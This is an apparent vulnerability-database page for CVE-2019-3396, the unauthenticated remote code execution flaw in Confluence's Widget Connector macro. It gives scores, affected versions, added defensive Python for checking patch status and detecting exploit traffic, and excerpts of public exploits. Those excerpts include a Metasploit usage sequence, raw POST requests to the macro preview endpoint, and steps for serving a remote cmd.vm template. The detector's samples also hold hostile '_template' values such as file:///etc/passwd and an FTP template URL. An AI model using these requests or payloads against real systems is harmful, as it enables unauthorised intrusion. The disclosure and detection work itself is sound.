CVSSv2 score: 10

CVE-2019-3396

Published: 25/03/2019 Updated: 22/04/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 prior to 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 prior to 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 prior to 6.14.2 (the fixed version for 6.14.x), allows remote malicious users to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
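The fixed-version wording above is easy to misread because each release line has its own fix: 6.6.12 closes everything below 6.7.0, while 6.7.0 through 6.12.2, 6.13.0 through 6.13.2 and 6.14.0 through 6.14.1 each need their own patch release. The following check is an added example, not code from this page or from Atlassian; it encodes only the ranges stated in the summary, and the version strings it is exercised with at the bottom are constructed samples.

```python
"""Patch-status check for CVE-2019-3396 (Confluence Widget Connector SSTI).

Added example, not from the advisory page or from Atlassian. It encodes
only the affected/fixed ranges stated in the vulnerability summary.
"""
import re

# (first affected, first fixed) per release line, taken from the summary.
# 6.6.12 is the fix for every release below 6.7.0, so that range starts at 0.
FIXED_RANGES = [
    ((0, 0, 0), (6, 6, 12)),
    ((6, 7, 0), (6, 12, 3)),
    ((6, 13, 0), (6, 13, 3)),
    ((6, 14, 0), (6, 14, 2)),
]


def parse_version(text):
    """Turn '6.13.1' or '6.12' into a comparable (major, minor, patch) tuple."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Confluence version: {text!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def is_vulnerable(text):
    """True if the version falls inside any of the affected ranges."""
    v = parse_version(text)
    return any(lo <= v < hi for lo, hi in FIXED_RANGES)


def recommended_fix(text):
    """Smallest fixed version on the release line the instance is on, or None."""
    v = parse_version(text)
    for lo, hi in FIXED_RANGES:
        if lo <= v < hi:
            return ".".join(str(n) for n in hi)
    return None


if __name__ == "__main__":
    # Constructed sample versions, not observations from any real instance.
    for sample in ["5.10.8", "6.6.11", "6.6.12", "6.12", "6.12.3", "6.13.1", "6.14.1", "6.14.2", "6.15.0"]:
        state = "VULNERABLE -> upgrade to " + recommended_fix(sample) if is_vulnerable(sample) else "not affected"
        print(f"{sample:8} {state}")
```

The version string is what `/rest/api/settings/systemInfo` or the footer of a Confluence page reports; feed that in rather than the installer filename, which can lag the running build.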

Affected Products

Vendor: Atlassian
Product: Confluence
Versions: 1.0, 1.0.1, 1.0.3, 1.1, 1.1.1, 1.1.2, 1.2, 1.2.1, 1.2.2, 1.2.3, 1.3, 1.3.1, 1.3.2, 1.3.4, 1.3.5, 1.3.6, 1.4, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 2.6, 2.6.1, 2.6.2, 2.6.3, 2.7, 2.7.1, 2.7.2, 2.7.3, 2.7.4, 2.8, 2.8.1, 2.8.2, 2.8.3, 2.9, 2.9.1, 2.9.2, 2.9.3, 2.10, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 3.0, 3.0.1, 3.0.2, 3.1, 3.1.1, 3.1.2, 3.2, 3.2.1, 3.3, 3.3.1, 3.3.3, 3.4, 3.4.1, 3.4.2, 3.4.3, 3.4.5, 3.4.6, 3.4.7, 3.4.8, 3.4.9, 3.5, 3.5.1, 3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6, 3.5.7, 3.5.9, 3.5.11, 3.5.13, 4.0, 4.0.3, 4.0.4, 4.0.5, 4.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7, 4.1.9, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.3.5, 4.3.6, 4.3.7, 5.0, 5.0.1, 5.0.2, 5.0.3, 5.1, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 5.1.5, 5.2.3, 5.2.4, 5.2.5, 5.3, 5.3.1, 5.3.4, 5.4, 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.5, 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.5.6, 5.5.7, 5.6, 5.6.1, 5.6.3, 5.6.4, 5.6.5, 5.6.6, 5.7, 5.7.1, 5.7.3, 5.7.4, 5.7.5, 5.7.6, 5.8.2, 5.8.4, 5.8.5, 5.8.6, 5.8.8, 5.8.9, 5.8.10, 5.8.13, 5.8.14, 5.8.15, 5.8.16, 5.8.17, 5.8.18, 5.9.1, 5.9.2, 5.9.3, 5.9.4, 5.9.5, 5.9.6, 5.9.7, 5.9.8, 5.9.9, 5.9.10, 5.9.11, 5.9.12, 5.9.14, 5.10, 5.10.0, 5.10.1, 5.10.2, 5.10.3, 5.10.4, 5.10.5, 5.10.6, 5.10.7, 5.10.8, 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.1, 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.2, 6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.3, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.4, 6.4.1, 6.4.2, 6.4.3, 6.5, 6.5.1, 6.5.2, 6.5.3, 6.6, 6.6.1, 6.6.2, 6.6.3, 6.6.4, 6.6.5, 6.6.6, 6.6.7, 6.6.8, 6.6.9, 6.6.10, 6.6.11, 6.7.0, 6.7.1, 6.7.2, 6.7.3, 6.8, 6.8.1, 6.8.2, 6.8.3, 6.8.5, 6.9, 6.9.1, 6.9.3, 6.10, 6.10.1, 6.10.2, 6.11, 6.11.1, 6.11.2, 6.12, 6.12.1, 6.12.2, 6.13.0, 6.13.1, 6.13.2, 6.14.0, 6.14.1

Exploits

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remo ...

Mailing Lists

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embedding online videos, slideshows, photostreams and more directly into a page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, ...
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20 CVE ID: * CVE-2019-3395 * CVE-2019-3396 Product: Confluence Server and Confluence Data Center Affected Confluence Server and Confluence Data Center product vers ...

Metasploit Modules

Atlassian Confluence Widget Connector Macro Velocity Template Injection

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embedding online videos, slideshows, photostreams and more directly into a page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, the Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.

msf > use exploit/multi/http/confluence_widget_connector
msf exploit(confluence_widget_connector) > show targets
      ...targets...
msf exploit(confluence_widget_connector) > set TARGET <target-id>
msf exploit(confluence_widget_connector) > show options
      ...show and set options...
msf exploit(confluence_widget_connector) > exploit

Github Repositories

CVE-2019-3396

CVE-2019-3396 Confluence RCE vulnerability detection script

CVE-2019-3396 Confluence unauthenticated RCE (CVE-2019-3396) vulnerability. Gotcha: some versions only succeed when a Referer header is added. File Read POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: 101020181 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: g

CVE-2019-3396_EXP CVE-2019-3396 confluence SSTI RCE 1. put the cmd.vm on your website (must use ftp or https, http doesn't work) 2. modify RCE_exp.py, change the filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21) 3. python REC_exp.py testwiki_testcc:8080 "whoami" $ python REC_exp.py testwiki_testcc:8080 "id&q

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraft.action?draf
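The proof-of-concept requests listed above share one shape: an unauthenticated POST to /rest/tinymce/1/macro/preview whose JSON body smuggles a `_template` parameter into the widget macro, pointing at either a local file (the "File Read" variant) or an attacker-hosted Velocity template (the RCE variant). That is enough to detect on the wire. The following detector is an added example, not code from this page or from any of the repositories it lists. It assumes a reverse proxy or WAF in front of Confluence that writes one JSON record per request with `src`, `method`, `path`, `headers` and `body` fields (those field names are an assumption; Tomcat's own access log does not capture bodies, so the body has to come from whatever sits in front of Confluence). The log records it runs over are constructed.

```python
"""Log-side detection of CVE-2019-3396 probing against the macro preview endpoint.

Added example, not code from this page or from any repository it lists.
Assumes a proxy/WAF log of one JSON record per request with the fields
"src", "method", "path", "headers" and "body" (field names are an assumption).
"""
import json
from urllib.parse import urlsplit

TARGET_PATH = "/rest/tinymce/1/macro/preview"

# Schemes seen in the public proof-of-concepts: a remote scheme fetches an
# attacker-hosted Velocity template (code execution); file:// reads a local
# file through the same path-traversal weakness.
REMOTE_SCHEMES = {"ftp", "ftps", "http", "https"}
LOCAL_SCHEMES = {"file"}


def _walk(obj):
    """Yield every (key, value) pair at any depth of a parsed JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from _walk(item)


def inspect_request(record):
    """Return a finding dict if the request carries a Widget Connector
    _template parameter, else None. A normal macro preview never sends
    _template, so any occurrence is worth an alert."""
    if record.get("method") != "POST":
        return None
    if urlsplit(record.get("path", "")).path != TARGET_PATH:
        return None
    try:
        body = json.loads(record.get("body") or "")
    except ValueError:
        return None
    for key, value in _walk(body):
        if key != "_template" or not isinstance(value, str):
            continue
        scheme = urlsplit(value).scheme.lower()
        if scheme in REMOTE_SCHEMES:
            severity = "critical"   # remote template: RCE attempt
        elif scheme in LOCAL_SCHEMES:
            severity = "high"       # local file read attempt
        else:
            severity = "medium"     # unexpected, but not a known PoC shape
        headers = record.get("headers") or {}
        return {
            "src": record.get("src"),
            "template": value,
            "scheme": scheme or "none",
            "severity": severity,
            # Some PoCs only work with a Referer set; keep it for triage.
            "referer": headers.get("Referer"),
        }
    return None


def scan(lines):
    """Run inspect_request over JSON-lines log text and return the findings."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        finding = inspect_request(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


def _record(src, method, path, params, referer=None):
    """Build one constructed log record in the assumed proxy format."""
    headers = {"Content-Type": "application/json"}
    if referer:
        headers["Referer"] = referer
    body = {"contentId": "1", "macro": {"name": "widget", "params": params, "body": ""}}
    return json.dumps({"src": src, "method": method, "path": path,
                       "headers": headers, "body": json.dumps(body)})


# Constructed sample log: a normal preview, a file-read probe, a remote
# template attempt with the Referer the PoCs mention, and an unrelated GET.
SAMPLE_LOG = [
    _record("10.0.0.5", "POST", TARGET_PATH,
            {"url": "https://www.youtube.com/watch?v=example"}),
    _record("203.0.113.7", "POST", TARGET_PATH,
            {"url": "https://www.youtube.com/watch?v=example",
             "_template": "file:///etc/passwd"}),
    _record("203.0.113.7", "POST", TARGET_PATH + "?x=1",
            {"url": "https://www.youtube.com/watch?v=example",
             "_template": "ftp://203.0.113.9/cmd.vm"},
            referer="http://confluence.example.test/pages/resumedraft.action?draftId=1"),
    _record("10.0.0.5", "GET", "/pages/viewpage.action", {}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['src']:15} {f['template']}")
```

Because the endpoint is reachable without authentication, a hit on it from outside the ranges your users normally come from is itself a useful low-severity signal even when the body is not logged; the `_template` check is what turns that into a confident alert.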

EGI Foundation Security Announcements 2019-04-10 security incident affecting collaboration tools 2019-04-16 Initial public announcement Last Wednesday, 10 April 2019, an intrusion was detected on the site used to host collaboration services for EGI, including the EGI SSO Identity Provider, Confluence installation of the EGI Foundation and the EOSC-hub and ENVRI+ projects The f